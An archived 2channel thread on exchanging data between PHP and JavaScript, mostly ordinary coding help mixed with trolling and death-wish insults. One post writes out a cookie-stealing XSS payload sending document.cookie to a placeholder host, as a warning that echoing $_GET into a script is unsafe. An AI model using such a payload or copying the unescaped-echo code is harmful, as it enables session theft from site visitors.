2ちゃんねる★スマホ版★■掲示板に戻る■全部1-最新50

PHPとjavascriptの連携

1 :
nobodyさん
2005/10/18(火) 12:42:20 ID:GCOYbBwB
知ってる?
2 :
2005/10/18(火) 12:51:50 ID:???
Ajaxでもやってろ
3 :
2005/10/18(火) 12:56:23 ID:???
(・c_・`)
4 :
2005/10/18(火) 13:03:09 ID:???
>>3
キモ
5 :
2005/10/18(火) 16:22:02 ID:???
phpとjsの変数のやりとりは
6 :
2005/10/18(火) 16:41:05 ID:???
(・c_・`) .。oO(氏ねばいいのになァ…
7 :
2005/10/19(水) 08:24:05 ID:???
おまえがな
8 :
2005/10/19(水) 08:50:38 ID:???
     _ ,,, . .,,, _
    ,.、;',,;;;;;;;;;;;;;;;;;;;;;,.`丶.
    /,;;;;;;;;;;;;;:、- ‐ ' ''= 、;;,.ヽ
.   ,',;;;;;;;;;;;i'"         ヽ;,.'、
  {,;;;;;;;;;;;;{  _,,;;;;,、    ,,;,、;,.',
  _l,;;;;;;;;;厂 〃 .__、` ,r' ゙゙`'};;,.j
. { トヽ;;;;;!   '´ ̄ ` { '=ッ{;<      !   .  , ,      .
. ヽ.ゞさ;;}      ,.r'_ ,..)、  !;,.!  ヽ、_,人_,ノ、_,从,人.ィj、ノv1
  ヽニY    ,.r' _`;^´!  ,';/    )
    ヾ:、    ヾ= 三;〉 /'′ ‐=、´ 君が氏ねば
    ノ,;:::\   ` ー" , '      )   いいじゃないか
 ,.、-',;;;{ ヾ:ヽ、 __ ,∠、
',,;;;{ {;;;;;;ヽ     }::〈;;;;;;;;l iヽ、   , '⌒r‐v'ヽィ'⌒Yソ、ト、!yヘ!
,;;;;;ヽ、ヽ;;;;\  ,r'::::ノ;;;;;;j j;;;;,.`ヽ、
9 :
2005/10/19(水) 20:01:00 ID:???
(・c_・`) .。oO(糞スレ立てた上に逆ギレ…
10 :
2005/10/20(木) 02:33:28 ID:???
キモイ
11 :
nobodyさん
2005/10/20(木) 10:07:54 ID:3vTNgWiJ
cの鼻が特に
12 :
2005/10/20(木) 13:30:35 ID:???
(・z_・`) .。oO(スマートにしてみた…
13 :
2005/10/20(木) 17:26:18 ID:???
(・z_・`) .。oO(I WANT YOUR DEATH…
14 :
2005/10/21(金) 08:39:46 ID:???
(・く_・`) .。oO(鼻が大きいと…
15 :
nobodyさん
2005/10/21(金) 10:31:07 ID:PKgg89Vr
異様に腹がたつ顔だ
16 :
2005/10/21(金) 17:01:50 ID:???
(・c_・`) .。oO(クズなのにうるさい人だなァ…
17 :
2005/10/21(金) 17:51:19 ID:???
(・z_・`) .。oO(SHININASAI >>15
18 :
2005/12/09(金) 05:06:25 ID:???
(・∞_・`) .。oO(みんな連携しようよ
19 :
nobodyさん
2005/12/14(水) 13:50:37 ID:6vnlY+yb
俺も知りたい
20 :
2005/12/14(水) 16:28:02 ID:???
難しく考えすぎじゃね?

<?php
<script type="text/javascript">
$php_hensuu = js_hensuu;
js_hensuu2 = $php_hensuu2;
</script>
?>

21 :
2006/02/03(金) 06:39:37 ID:???
hensuu2のほうはできると思うけどhensuuのほうはそれじゃ無理じゃない?
22 :
2006/04/02(日) 05:10:27 ID:???
言っとくけど、PHPはサーバーサイド
java Scriptはクライアントサイドだぞ。
通信には、XMLとかで送るしか無いかと思われ
23 :
2006/04/02(日) 06:33:38 ID:???
JSONって手もあるぞ。こっちのほうが扱いは楽だね
24 :
2006/04/02(日) 18:26:52 ID:???
JSONって、Javaスクリプト側だと標準でオブジェクトとして扱えるけど
送信先のPHPでは、標準で扱うパーサーとかあるの?
25 :
nobodyさん
2006/04/10(月) 02:04:07 ID:g9BJzf9S
26 :
2006/04/10(月) 02:19:33 ID:???
164はいらなかった。あとsage忘れた。スマソ
27 :
nobodyさん
2006/04/20(木) 11:29:45 ID:FXc+fti1
http://www.humanclock.com/clock.php

ここの時計を自サイトでも表示させたいと思ってるのですが、
PHPとJavaScriptで可能ですか?
28 :
2006/04/20(木) 13:03:58 ID:???
>>27
Can I run the clock from within my website?
No, technically it would be a bit hard, plus I have enough bandwidth problems already and if other people were running the site they would be even worse.

ってあるけど。
自分で画像用意して同じようなやつを作りたいってこと?
一分で一枚使うから、最低でも24×60=1440枚画像用意しなきゃいけないけど…。
技術的には可能だけど、大変だよ。鯖もそれなりじゃないと。
29 :
2006/04/20(木) 21:55:50 ID:???
>29

いえ、そうじゃなくて画像を引っ張って来るってことでした。

が、だめそうですね。
ありがとうございました。

でもすごくなごむんですよね。この時計たち。
30 :
nobodyさん
2006/04/25(火) 02:21:41 ID:sQ1wd8RT
javascriptでalert(r);
としたときに、[object Object]とポップアップします。
このrのプロパティなど情報を知りたいんですが、どのような方法があるでしょうか。

PHPだと、var_dump(), print_r()といった関数がありますが・・

javascriptは経験が浅くてわかりません。
よろしくおねがいします。
31 :
2006/04/25(火) 23:13:21 ID:???
>>30
とりあえずfor-inでまわすのが手軽かな
var msg = ""
for (var prop in r) msg += prop + ": " + r[prop] + "\n"
あとはalertするなり<pre>内に表示するなり好きにして。
コンポジションになってるオブジェクトはまあ適宜ってことで。
DOMの要素とかこれでのぞくとプロパティがやたら多かったりするからな。

つーか板違いやんけorz
32 :
2006/04/25(火) 23:25:27 ID:???
>31
ありがとう、ありがとう。
家かえったらやってみるよ
どうもね。
33 :
2006/04/26(水) 00:44:29 ID:???
>>30

つ【ttp://www.mozilla.org/projects/venkman/】
34 :
2006/04/30(日) 17:08:37 ID:???
xajaxやZend_JSONを使おう。
35 :
2006/05/01(月) 01:19:29 ID:???
for(prop in ..)
で回してみました。確かに未知なオブジェクトにアクセスできます。
ありがとうございます。

venkmanいいですね。ありがとうございます。
今後のjsのデバッグはこれを使おうと思います。
が、firefoxごとお亡くなりになったりしたときに次回からfirefoxは起動しても
venkmanは起動しなくなりました(ログアウトログインすれば大丈夫)
venkmanのプロセスが残っている?んでしょうか。何かご存じでしたら教えてください。

xajax、zend_JSONについてはよく知りません。調べてみます。


ちなみにやろうとしていることは
ajax+soapという組み合わせです。
jsでのsoapクライアントとしてGURU4.netのクライアントを使おうとしています。
で、これのcallback関数への引数のオブジェクトの内容がよくわからなかったのが質問の発端でした。
すれちがいどうもすいませんでした。
36 :
2006/05/21(日) 23:56:25 ID:???
普通にprototypeとか使ってた方がやりやすいわな
37 :
nobodyさん
2007/03/27(火) 19:23:19 ID:NjuRfJym

38 :
2007/03/27(火) 20:25:08 ID:???
>>28
画像とかを抜けばかなり簡単なスクリプトだがな。
39 :
2007/05/01(火) 13:20:50 ID:???
Smartyと連携して使いやすい
JavaScriptのバリデータ欲しいwww

40 :
nobodyさん
2007/10/12(金) 10:11:39 ID:NdUlZV+s
xajaxはどうよ?
41 :
nobodyさん
2007/10/21(日) 02:02:07 ID:KqyRsNL6
すみません、 この記述って問題ありますか? 回答お願いします。
<scrpt language="javascript">
aBoxNum = <?php $_GET['aBoxNum'] ?>;
</script>
42 :
2007/10/21(日) 02:11:12 ID:???
すみません、解決しました
<?php print $_GET{'aBoxNum']; ?> でした  
43 :
2007/10/21(日) 10:52:36 ID:???
>>42
老婆心から、

<?php print $_GET{'aBoxNum']; ?>は、省略表記あるよ

<?=$_GET{'aBoxNum']?>でOK

<?= ... ?>が、<? php print ... ?>を表しているよ。
44 :
2007/10/21(日) 12:35:30 ID:???
>>41
$_GET['aBoxNum']

1;document.href='http://exsample.com/?'+document.cookie
とか入れてもいいの?
45 :
2007/10/21(日) 23:13:20 ID:???
>>43
知らなかったよ ありがとう
>>44
すみません、ちょっと意味がわかりません ゴメンよ
46 :
2007/10/27(土) 03:12:41 ID:???
>>45
そのままだとスーパーハカーにやられちゃうよってこと
47 :
2007/10/30(火) 11:11:23 ID:???
<?= ?>のショートタグ使うよりヒアドキュメントを使っていった方が
スクリプトが巨大化したときに楽かもしれんわよ
動くなら好きな方法でいいけどね
48 :
2007/12/04(火) 18:17:22 ID:???
you SmartyやっちゃいなYO
49 :
nobodyさん
2009/08/18(火) 14:07:14 ID:pm1nwP+7
なんでこういう実践的なスレの更新が滞っているんだ。

いいか、お前ら、JSの数値比較で => はダメだぞ。
=> じゃなきゃダメだぞ。

そんなことで20分も悩んでしまった・・・・orz
FireBugとIE8開発者ツールにありがとう。
50 :
nobodyさん
2009/09/06(日) 21:40:43 ID:2zF5GI8B
>>49
>=ね。
逆に、これ以外の記法を持つ言語って見たことないかも。
51 :
2009/09/07(月) 17:46:09 ID:???
ajax に乗り遅れた俺にはahahが簡単で素敵ですごい
52 :
2009/09/26(土) 06:27:28 ID:???
>>51
AJAXの胆は、XMLじゃなくてHTTPリクエストの部分なんだけどね
AHAHも結局HTTPリクエストを投げるわけだからAJAXと理屈は一緒。
とどのつまりTEXTデータであればなんでもいい。(AJAXの「X」の意味が形骸化している)
53 :
2009/09/28(月) 16:55:04 ID:???
サーバーサイドで実行できるjqueryのオープンソース phpquery

サーバー側でHTMLをjqueryで整形できるよ。

http://code.google.com/p/phpquery/
54 :
2009/09/28(月) 17:06:39 ID:???
$doc = phpQuery::newDocumentHTML("http://www.yahoo.co.jp/");

$html = $doc['div'] -> html();

サーバーサイド側でこんな簡単にHTMLが抜け出せる。
正規表現も使わないで済む。jqueryライクな書き方でOK
55 :
2009/09/28(月) 17:33:37 ID:???
やってみたけど何もでないよ
56 :
2009/10/09(金) 01:08:15 ID:???
まさに今悩んで作ってるよ。

画面遷移を伴うHTMLにはjsではないといけないってのがつらい。
PHPはかなり分かってきたけど、jsで受け取った値や配列をPHPに渡す、またはその逆ってのが癖があってつらい。
57 :
2009/10/09(金) 02:02:06 ID:???
>>56
Javascript -> PHPは、単に指定したURLにGETのリクエストを送るだけ。
値はGETのクエリパラメータとしてくっつけて

PHP -> Javascriptは、Javascriptで読める形で、レスポンスデータを返してあげるだけ。
JSONが無難だろうね。PHPの配列からJSON関数で簡単に変換出来るし


どちらも、何らかのJavascriptのライブラリ使ってれば、PHPへの送信、受け取りは簡単に出来ると思うよ。


> 画面遷移を伴うHTMLにはjsではないといけないってのがつらい。
画面遷移させるのに、Javascriptは必須じゃないと思うが、きっとそうゆう仕様なんだろうね。合掌
58 :
nobodyさん
2009/10/22(木) 11:32:47 ID:0+6NQoV3
良スレなんであげておきますね( ‘д‘)
59 :
2012/11/11(日) 23:05:45.15 ID:???
知らない
60 :
nobodyさん
2014/09/11(木) 13:51:24.73 ID:mOAUdLQF
JQUERYエラー:JS/JQUERY.MIN.MAP 404 (NOT FOUND)
こんなエラーが出た場合の対処方法

http://know-how-tree.com/archives/558
61 :
2014/09/28(日) 11:16:33.31 ID:???
>>60
広告だらけのウンコサイト。デザインがひでぇ
62 :
2014/10/13(月) 03:29:30.30 ID:???
PHP+javascriptで専ブラ作ろうとしたんだけど
2chの連投規制とかリロードでバーボンになったりとか考えると、とても無理だな(´・ω・`)
P2とかは完全提携だから出来るんだろうな
63 :
nobodyさん
2014/12/18(木) 10:37:48.57 ID:V7CVu2r1
>>26
64 :
nobodyさん
2015/11/08(日) 13:37:15.69 ID:iGtQzx/6
転職の際は要チェック。
下記の条件が全て当てはまる会社にご注意下さい。

・IT系 in Tokyo
・転職会議で2.5点
・転職会議の「その他>2ch情報」の欄で過去の労基2chスレが表示される
15KB

新着レスの表示

★スマホ版★■掲示板に戻る■全部前100次100最新50

名前:E-mail: